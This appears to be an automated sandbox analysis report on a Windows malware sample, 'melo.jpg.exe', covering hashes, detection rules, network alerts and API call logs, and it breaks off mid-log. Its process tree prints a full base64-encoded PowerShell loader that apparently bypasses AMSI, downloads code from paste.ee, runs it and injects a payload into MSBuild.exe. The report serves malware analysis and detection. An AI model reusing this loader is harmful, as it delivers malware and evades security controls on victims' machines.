Summary | ZeroBOX

melo.jpg.exe

Process Kill CryptGenKey FindFirstVolume Antivirus
Category Machine Started Completed
FILE s1_win7_x6402 April 22, 2021, 5:19 p.m. April 22, 2021, 5:21 p.m.
Size 849.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 82b9be6f5cc10510495e9a3368683747
SHA256 3fc28498833acc5f00efedc5d9392acf326cc940e2dd255544416c3863c109ab
CRC32 C149A282
ssdeep 24576:UAHnh+eWsN3skA4RV1Hom2KXMmHaen95:jh+ZkldoPK8Yae3
Yara
  • Device_Check_Zero - Device Check Zero
  • Process_Snapshot_Kill_Zero - Process Kill Zero
  • CryptGenKey_Zero - CryptGenKey Zero
  • FindFirstVolume_Zero - FindFirstVolume Zero
  • inject_thread - Code injection with CreateRemoteThread in a remote process
  • network_http - Communications over HTTP
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • keylogger - Run a keylogger
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_files_operation - Affect private profile
  • Str_Win32_Winsock2_Library - Match Winsock 2 API library declaration
  • Str_Win32_Wininet_Library - Match Windows Inet API library declaration
  • Str_Win32_Internet_API - Match Windows Inet API call
  • Str_Win32_Http_API - Match Windows Http API call
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check
  • AutoIt - www.autoitscript.com/site/autoit/

  • melo.jpg.exe "C:\Users\test22\AppData\Local\Temp\melo.jpg.exe"

    5580
    • powershell.exe powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

      2352
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

        6096

IP Address Status Action
104.26.5.223 Active Moloch
142.250.204.110 Active Moloch
142.250.34.2 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49810 -> 104.26.5.223:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49814 -> 142.250.204.110:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 142.250.34.2:80 -> 192.168.56.102:49816 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 142.250.34.2:80 -> 192.168.56.102:49816 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.102:49815 -> 172.217.161.131:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49810
104.26.5.223:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com e8:17:95:f3:a8:85:c4:14:59:ce:21:47:7d:34:50:64:8f:1c:2b:7f
TLS 1.2
192.168.56.102:49814
142.250.204.110:443
C=US, O=Google Trust Services, CN=GTS CA 1O1 C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com 2f:5c:43:f2:d2:53:75:f8:0a:ac:79:a2:90:87:26:97:e9:8a:c9:0a
TLS 1.2
192.168.56.102:49815
172.217.161.131:443
C=US, O=Google Trust Services, CN=GTS CA 1O1 C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com c2:b5:f0:1b:46:55:3f:d3:65:b2:1d:5c:cc:56:a7:41:ac:9c:7a:22

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: True
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007474a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746ae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746ae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746ae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746ae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746ae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746ae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00746aa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007473e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007466e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00747220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00747220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029a680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ad80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ad80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029ad80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029b040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029b040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029b040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029b040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029b040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029b040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/r/oSlYJ
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/r/p7EHC
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:2713802909&cup2hreq=8cab5512950206d82ca4581cc9d1ccfba8c54dfd64bf2baf0aa7e90da4734256
request HEAD http://edgedl.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request GET http://edgedl.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request GET https://paste.ee/r/oSlYJ
request GET https://paste.ee/r/p7EHC
request GET https://clients2.google.com/service/check2?crx3=true&appid=%7B430FD4D0-B729-4F61-AA34-91526481799D%7D&appversion=1.3.36.32&applang=&machine=1&version=1.3.36.32&userid=&osversion=6.1&servicepack=Service%20Pack%201
request POST https://update.googleapis.com/service/update2?cup2key=10:2713802909&cup2hreq=8cab5512950206d82ca4581cc9d1ccfba8c54dfd64bf2baf0aa7e90da4734256
request POST https://update.googleapis.com/service/update2?cup2key=10:2713802909&cup2hreq=8cab5512950206d82ca4581cc9d1ccfba8c54dfd64bf2baf0aa7e90da4734256
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 5580
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc91000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
